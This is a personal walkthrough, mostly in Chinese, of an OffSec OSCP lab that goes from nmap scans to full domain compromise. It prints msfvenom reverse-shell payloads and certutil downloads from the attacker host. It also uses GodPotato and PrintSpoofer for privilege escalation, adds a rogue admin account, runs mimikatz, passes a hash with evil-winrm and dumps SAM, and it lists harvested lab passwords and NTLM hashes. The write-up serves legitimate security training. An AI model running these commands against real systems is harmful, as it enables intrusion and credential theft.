OSCP-A
00 min
2025-3-29
Source
https://portal.offsec.com/courses/pen-200-44065/labs
Date
Mar 28, 2025
Tag
Credential Harvesting
Nmap
Web Application Security

Challenge 4 - Machine Credentials

DC01(10.10.165.140)
No credentials provided
MS01(192.168.205.141)
Eric.Wallows / EricLikesRunning800
MS02(10.10.165.142)
No credentials provided
Aero(192.168.205.143)
No credentials provided
Crystal(192.168.205.144)
No credentials provided
Hermes(192.168.205.145)
No credentials provided

MS01(192.168.219.141)

Credentials

Username
Hash
Password
From
For
Result
nurhodelta
$2y$10$fCOiMky4n5hCJx3cpsG20Od4wHtlkCLKmO6VLobJNRIg9ooHTkgjK
password
SQL File
http://192.168.219.141:81/Admin/index.php
Fail : image 1
N/A
'PHPSESSID': ‘nka89v0l7i9e1omqcng50kh1ps’
N/A
Script
Script
Success : image 2
eppp
N/A
65eDlL&fpDUL10
Create
MS01(192.168.219.141)
Image 1
Image 1
Image2
Image2
 

Nmap

nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 03:18 EDT Warning: 192.168.219.141 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.219.141 Host is up (1.2s latency). All 65535 scanned ports on 192.168.219.141 are in ignored states. Not shown: 55110 open|filtered udp ports (no-response), 10425 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 155.99 seconds
nmap-sS.result
791.5KB
nmap -sS -p- --min-rate 5000 -oO 192.168.219.141 nmap-sS.result
Nmap 7.94SVN scan initiated Fri Mar 28 03:19:13 2025 as: /usr/lib/nmap/nmap -sS -p- --min-rate 5000 -oO 192.168.219.141 nmap-sS.result
Nmap scan report for 192.168.219.141 Host is up (0.10s latency). Not shown: 65516 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 81/tcp open hosts2-ns 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3306/tcp open mysql 3307/tcp open opsession-prxy 5040/tcp open unknown 5985/tcp open wsman 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown 51775/tcp open unknown
nmap -Pn -n $ip -sC -sV -p22,80,81,135,139,445,3306,3307,5040,5985,47001,49664,49665,49666,49667,49668,49669,49670,51775 --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 03:58 EDT Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 52.63% done; ETC: 03:59 (0:00:23 remaining) Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 52.63% done; ETC: 03:59 (0:00:23 remaining) Nmap scan report for 192.168.219.141 Host is up (0.10s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 e0:3a:63:4a:07:83:4d:0b:6f:4e:8a:4d:79:3d:6e:4c (RSA) | 256 3f:16:ca:33:25:fd:a2:e6:bb:f6:b0:04:32:21:21:0b (ECDSA) |_ 256 fe:b0:7a:14:bf:77:84:9a:b3:26:59:8d:ff:7e:92:84 (ED25519) 80/tcp open http Apache httpd 2.4.51 ((Win64) PHP/7.4.26) |_http-server-header: Apache/2.4.51 (Win64) PHP/7.4.26 81/tcp open http Apache httpd 2.4.51 ((Win64) PHP/7.4.26) |_http-server-header: Apache/2.4.51 (Win64) PHP/7.4.26 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3306/tcp open mysql MySQL (unauthorized) 3307/tcp open opsession-prxy? 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 51775/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |smb2-time: Protocol negotiation failed (SMB2) | smb2-security-mode: | 3:1:1: | Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 137.99 seconds

80

notion image
notion image
notion image
重要的路径:
http://192.168.205.141/script/
notion image

81

notion image
notion image
notion image
重要的路径:

http://192.168.205.141:81/db/

Screen shot
notion image
Admin credentials nurhodelta : $2y$10$fCOiMky4n5hCJx3cpsG20Od4wHtlkCLKmO6VLobJNRIg9ooHTkgjK:password
notion image
employees
notion image

http://192.168.205.141:81/Admin/index.php

刚刚的账户密码用不了
notion image

http://192.168.205.141:81/conn

SQL information
notion image

Exploit

尝试搜索了一下这个系统,找到了两个脚本,一个是sqli绕过验证,一个是RCE并且可以获得reverse shell
notion image
notion image
notion image
首次尝试均已失败告终,查看代码后发现是路径问题,修改之后,成功执行脚本
notion image
notion image
notion image
notion image
但是似乎我并没有权限去其他路径
notion image
尝试去获得一个稳固的shell是否有用
notion image
修改这里的代码看看能否获得reverse shell
失败
转去网页看看是否有其他有用的信息
并没有,还是需要使用Shell做做事
notion image
在尝试了多种shell之后终于获取到了
 

139

notion image

PE

notion image
看到SeImpersonatePrivilege Impersonate a client after authentication Enabled
是Enabled的,那么我们可以用godpotato去尝试PE
当网页超时会导致shell断开,使用exe去获得shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.182 LPORT=1234 -f exe -o reverse.exe
notion image
certutil.exe -urlcache -split -f http://192.168.45.182:8000/reverse.exe reverse.exe
notion image
got it

SeImpersonatePrivilege提权利用

首先,我们需要下载GodPotato工具来利用SeImpersonatePrivilege特权: certutil.exe -urlcache -split -f http://192.168.45.182:8000/GodPotato-NET2.exe GodPotato-NET2.exe
接下来,使用msfvenom生成一个反向shell载荷,用于连接回我们的攻击机器: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.182 LPORT=2222 -f exe -o reverse_admin.exe
然后,将反向shell可执行文件传输到目标机器: certutil.exe -urlcache -split -f http://192.168.45.182:8000/reverse_admin.exe reverse_admin.exe
最后,使用GodPotato执行我们的载荷来进行权限提升: GodPotato-NET2.exe -cmd reverse_admin.exe
执行完这个提权序列后,理论上我们应该能获得机器账户权限。但是,提升后的shell似乎不太稳定,执行后几乎立即就关闭了。这表明我们需要尝试其他Potato exploit变体来获得更稳定的提权效果。
那我们尝试添加一个admin account
GodPotato-NET2.exe -cmd "net user eppp 65eDlL&fpDUL10 /add”
notion image
GodPotato-NET2.exe -cmd "net localgroup Administrators eppp /add”
notion image
无法使用runas去执行命令,密码无法输入,尝试使用psexe
certutil.exe -urlcache -split -f http://192.168.45.182:8000/PsExec.exe PsExec.exe
依旧不行有其他错误
尝试使用其他滥用脚本
certutil.exe -urlcache -split -f http://192.168.45.182:8000/PrintSpoofer64.exe PrintSpoofer64.exe
PrintSpoofer64.exe -i -c reverse_admin.exe
notion image
成功成为local admin

Domain/Proxy Setting

Credentials

Username
Hash
Password
From
For
celia.almeda
NTLM : e728ecbadfb02f51ce8eed753f3ff3fd
N/A
mimikatz
Domain
DefaultPassword
N/A
7k8XHk3dMtmpnC7
mimikatz
Domain
Mary.Williams
N/A
69jHwjGN2bPQFvJ
mimikatz
Domain
N/A
N/A
hghgib6vHT3bVWf
local file
N/A
N/A
N/A
TreeFlaskDomestic505
local file
Mysql
administrator
N/A
OSCP!@#4
Changed
192.168.215.141
先使用mimikatz去看看有没有可用信息
certutil.exe -urlcache -split -f http://192.168.45.182:8000/mimikatz.exe mimikatz.exe

net user /domain

枚举domain user
User accounts for \\DC01.oscp.exam
Administrator
Aimee.Hunt
Carol.Webb
celia.almeda
Chelsea.Byrne
Donna.Johnson
Emily.Bishop
eric.wallows
Frank.Farrell
Georgina.Begum
Guest
Jamie.Thomas
Jane.Booth
Janice.Turner
Joan.North
john.dorian
Kenneth.Coles
krbtgt
Lawrence.Kay
Leonard.Morris
Linda.Patel
Luke.Martin
Oliver.Gray
Sandra.Craig
Shane.Mitchell
sql_svc
Thomas.Robinson
tom.kinney
tom_admin
web_svc

File investigation

找到一些密码信息在本地文件中
notion image

RDP Open

Proxy

为了更好的操作,建立一个代理
frpc
frps
notion image
然后就可以在kali上进行各类操作了

MS02(10.10.165.142)

Nmap

nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-28 06:49 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 2.15 seconds
再扫描之后发现5985是开放的,那么我们直接使用之前的hash用evil-winrm尝试登录

IP CHANGED

evil-winrm -i 10.10.175.142 -u celia.almeda -H e728ecbadfb02f51ce8eed753f3ff3fd
notion image
notion image
got in
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM
notion image
可以从这些备份文件找到系统文件和存有用户hash的文件
python /usr/share/creddump7/pwdump.py SYSTEM SAM
notion image
我们可以看到tom_admin是domain admin, 那么我们就可以直接使用它进行登录
notion image

Domain Done

 
上一篇
HB
下一篇
AZ-900